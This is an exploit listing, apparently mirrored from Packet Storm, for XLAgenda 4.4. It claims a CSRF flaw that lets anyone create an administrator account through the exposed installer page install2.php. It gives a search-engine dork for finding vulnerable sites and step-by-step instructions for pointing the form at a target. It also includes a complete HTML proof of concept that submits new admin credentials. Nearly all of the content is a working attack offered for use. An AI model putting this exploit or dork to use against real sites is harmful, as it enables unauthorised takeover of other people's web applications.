## https://sploitus.com/exploit?id=PACKETSTORM:173791
====================================================================================================================================
| # Title : XLAgenda v4.4 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://xavier.lequere.net/xlagenda/ |
| # Dork : "Propulsé par XLAgenda 4.4" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin.
[+] Go to the line 12.
[+] Set the target site link Save changes and apply.
[+] infected file : /install/install2.php.
[+] http://127.0.0.1/xlagenda44/install/install2.php
[+] save code as poc.html .
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XLAgenda 4.4 | Installation</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex, nofollow" />
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<h1>Installation - Etape 2/3</h1>
<p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p>
<form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">
<h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>
<p>
<label for="user">Nom d'utilisateur :</label><br>
<input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>
(20 caractères maximum)
</p>
<p>
<label for="pass">Mot de passe :</label><br>
<input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>
(6 à 15 caractères)
</p>
<p>
<label for="pass2">Introduisez à nouveau le mot de passe :</label><br>
<input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *
</p>
<p>
<label for="nom">Nom :</label><br>
<input name="nom" type="text" id="nom" value="" size="30" />
</p>
<p>
<label for="prenom">Prénom :</label><br>
<input name="prenom" type="text" id="prenom" value="" size="30" />
</p>
<p>
<label for="email">Adresse email :</label><br>
<input name="email" type="text" id="email" value="" size="30" /> *
</p>
<p>
Les champs marqués d'un * sont obligatoires.<br>
Votre adresse email n'apparaîtra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.
</p>
<p style="text-align:center;">
<input type="submit" name="Submit" value="Continuer >>" />
</p>
</form></body>
</html>
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================